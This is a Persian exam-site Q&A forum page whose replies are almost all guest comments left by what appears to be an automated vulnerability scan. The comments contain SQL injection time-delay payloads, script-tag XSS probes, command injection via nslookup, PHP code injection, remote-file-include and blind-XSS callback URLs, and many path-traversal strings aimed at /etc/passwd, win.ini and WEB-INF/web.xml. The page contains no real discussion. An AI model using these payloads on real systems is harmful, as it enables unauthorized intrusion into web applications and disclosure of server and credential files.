خانه ایجاد آزمون (ویژه اساتید) درخواست آزمون پشتیبانی اخبار تماس با ما درباره ما

پرسش و پاسخ آزمون ۷ مهر

سوالات و مباحث مربوط به آزمون اول (7 مهر 1395) را در این بخش مطرح نمایید.

تاریخ ارسال: 1395-7-14
199 پاسخ
مهمان 11 مهر 1396 - 14:51

WEB-INF\web.xml

مهمان 24 مهر 1396 - 09:32

1

مهمان 24 مهر 1396 - 09:49

response.write(9841059*9511192)

مهمان 24 مهر 1396 - 09:49

'+response.write(9841059*9511192)+'

مهمان 24 مهر 1396 - 09:49

"+response.write(9841059*9511192)+"

مهمان 24 مهر 1396 - 09:49

2mF0P0sB

مهمان 24 مهر 1396 - 09:49

set|set&set

مهمان 24 مهر 1396 - 09:49

$(nslookup 7pJkGFQ3)

مهمان 24 مهر 1396 - 09:49

&nslookup wjyTLFmr&'\"`0&nslookup wjyTLFmr&`'

مهمان 24 مهر 1396 - 09:49

${9999942+10000159}

مهمان 24 مهر 1396 - 09:49

12345'"\'\");|]*{ <>�''????

مهمان 24 مهر 1396 - 09:49

'"()

مهمان 24 مهر 1396 - 09:50

)

مهمان 24 مهر 1396 - 09:50

!(()&&!|*|*|

مهمان 24 مهر 1396 - 09:50

^(#$!@#$)(()))******

مهمان 24 مهر 1396 - 09:50

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

مهمان 24 مهر 1396 - 09:50

1some_inexistent_file_with_long_name.jpg

مهمان 24 مهر 1396 - 09:50

Http://testasp.vulnweb.com/t/fit.txt

مهمان 24 مهر 1396 - 09:50

http://testasp.vulnweb.com/t/xss.html?%00.jpg

مهمان 24 مهر 1396 - 09:50

http://testasp.vulnweb.com/t/fit.txt?.jpg

مهمان 24 مهر 1396 - 09:50

testasp.vulnweb.com

مهمان 24 مهر 1396 - 09:50

;print(md5(acunetix_wvs_security_test));

مهمان 24 مهر 1396 - 09:50

';print(md5(acunetix_wvs_security_test));$a='

مهمان 24 مهر 1396 - 09:50

http://hitl1ovHXXH3d.bxss.me/

مهمان 24 مهر 1396 - 09:50

";print(md5(acunetix_wvs_security_test));$a="

مهمان 24 مهر 1396 - 09:50

${@print(md5(acunetix_wvs_security_test))}

مهمان 24 مهر 1396 - 09:50

${@print(md5(acunetix_wvs_security_test))}\

مهمان 24 مهر 1396 - 09:50

post-comment-topic

مهمان 24 مهر 1396 - 09:50

post-comment-topic

مهمان 24 مهر 1396 - 09:50

post-comment-topic/.

مهمان 24 مهر 1396 - 09:50

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

مهمان 24 مهر 1396 - 09:50

/www.vulnweb.com

مهمان 24 مهر 1396 - 09:50

'"

مهمان 24 مهر 1396 - 09:50

مهمان 24 مهر 1396 - 09:50

1

مهمان 24 مهر 1396 - 09:50

1

مهمان 24 مهر 1396 - 09:50

mLzl3B00

مهمان 24 مهر 1396 - 09:50

-1 OR 2+922-922-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:50

-1 OR 2+964-964-1=0+0+0+1

مهمان 24 مهر 1396 - 09:50

-1' OR 2+607-607-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:50

-1' OR 2+509-509-1=0+0+0+1 or 'gbdqyikB'='

مهمان 24 مهر 1396 - 09:50

-1" OR 2+239-239-1=0+0+0+1 --

مهمان 24 مهر 1396 - 09:50

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

مهمان 24 مهر 1396 - 09:50

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

مهمان 24 مهر 1396 - 09:50

-1; waitfor delay '0:0:6' --

مهمان 24 مهر 1396 - 09:50

-1); waitfor delay '0:0:6' --

مهمان 24 مهر 1396 - 09:50

1 waitfor delay '0:0:6' --

مهمان 24 مهر 1396 - 09:50

1'"

مهمان 24 مهر 1396 - 09:50

gNRxrekP'; waitfor delay '0:0:12' --

مهمان 24 مهر 1396 - 09:50

-1;select pg_sleep(12); --

مهمان 24 مهر 1396 - 09:50

\

مهمان 24 مهر 1396 - 09:50

1'"()&%<acx><script>9d2z(9577)</script></acx>

مهمان 24 مهر 1396 - 09:50

1����

مهمان 24 مهر 1396 - 09:50

-1);select pg_sleep(12); --

مهمان 24 مهر 1396 - 09:51

@@utyxU

مهمان 24 مهر 1396 - 09:51

-1));select pg_sleep(18); --

مهمان 24 مهر 1396 - 09:51

'"()&%<acx><script>9d2z(9209)</script></acx>

مهمان 24 مهر 1396 - 09:51

JyI=

مهمان 24 مهر 1396 - 09:51

WxDOczu3';select pg_sleep(18); --

مهمان 24 مهر 1396 - 09:51

�'�"

مهمان 24 مهر 1396 - 09:51

FFJkJWW9');select pg_sleep(18); --

مهمان 24 مهر 1396 - 09:51

1_9125

مهمان 24 مهر 1396 - 09:51

�''�""

مهمان 24 مهر 1396 - 09:51

1eUwgLWb'));select pg_sleep(18); --

مهمان 24 مهر 1396 - 09:51

(select convert(int,CHAR(65)))

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../etc/passwd

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../../../../../../proc/version

مهمان 24 مهر 1396 - 09:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../etc/passwd.jpg

مهمان 24 مهر 1396 - 09:51

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

مهمان 24 مهر 1396 - 09:51

/../..//../..//../..//../..//../..//etc/passwd.jpg

مهمان 24 مهر 1396 - 09:51

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

مهمان 24 مهر 1396 - 09:51

/etc/passwd

مهمان 24 مهر 1396 - 09:51

%2fetc%2fpasswd

مهمان 24 مهر 1396 - 09:51

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 24 مهر 1396 - 09:51

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 24 مهر 1396 - 09:51

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 24 مهر 1396 - 09:51

..��..��..��..��..��..��..��..��etc/passwd

مهمان 24 مهر 1396 - 09:51

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 24 مهر 1396 - 09:51

file:///etc/passwd

مهمان 24 مهر 1396 - 09:51

/\../\../\../\../\../\../\../etc/passwd

مهمان 24 مهر 1396 - 09:51

WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:51

/WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:51

WEB-INF\web.xml

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../windows/win.ini

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../boot.ini

مهمان 24 مهر 1396 - 09:51

../../../../../../../../../../windows/win.ini.jpg

مهمان 24 مهر 1396 - 09:51

������������������������������������������������windows��win.ini

مهمان 24 مهر 1396 - 09:51

................windowswin.ini

مهمان 24 مهر 1396 - 09:51

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 24 مهر 1396 - 09:51

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 24 مهر 1396 - 09:51

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 24 مهر 1396 - 09:51

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 24 مهر 1396 - 09:51

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 24 مهر 1396 - 09:51

WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:51

WEB-INF\web.xml

مهمان 11 مهر 1396 - 14:51

WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:51

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 11 مهر 1396 - 14:51

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

مهمان 11 مهر 1396 - 14:51

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

مهمان 11 مهر 1396 - 14:51

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

مهمان 11 مهر 1396 - 14:51

..\..\..\..\..\..\..\..\windows\win.ini

مهمان 11 مهر 1396 - 14:51

................windowswin.ini

مهمان 11 مهر 1396 - 14:51

������������������������������������������������windows��win.ini

مهمان 11 مهر 1396 - 14:51

../../../../../../../../../../windows/win.ini.jpg

مهمان 11 مهر 1396 - 14:51

C:\WINDOWS\system32\drivers\etc\hosts

مهمان 11 مهر 1396 - 14:51

../../../../../../../../../../windows/win.ini

مهمان 11 مهر 1396 - 14:51

WEB-INF\web.xml

مهمان 11 مهر 1396 - 14:51

/WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:51

WEB-INF/web.xml

مهمان 11 مهر 1396 - 14:51

/\../\../\../\../\../\../\../etc/passwd

مهمان 11 مهر 1396 - 14:51

file:///etc/passwd

مهمان 11 مهر 1396 - 14:51

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

مهمان 11 مهر 1396 - 14:51

..��..��..��..��..��..��..��..��etc/passwd

مهمان 11 مهر 1396 - 14:51

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

مهمان 11 مهر 1396 - 14:51

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

مهمان 11 مهر 1396 - 14:51

/.././.././.././.././.././.././.././../etc/./passwd%00

مهمان 11 مهر 1396 - 14:51

%2fetc%2fpasswd

مهمان 11 مهر 1396 - 14:51

/etc/passwd

مهمان 11 مهر 1396 - 14:51

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

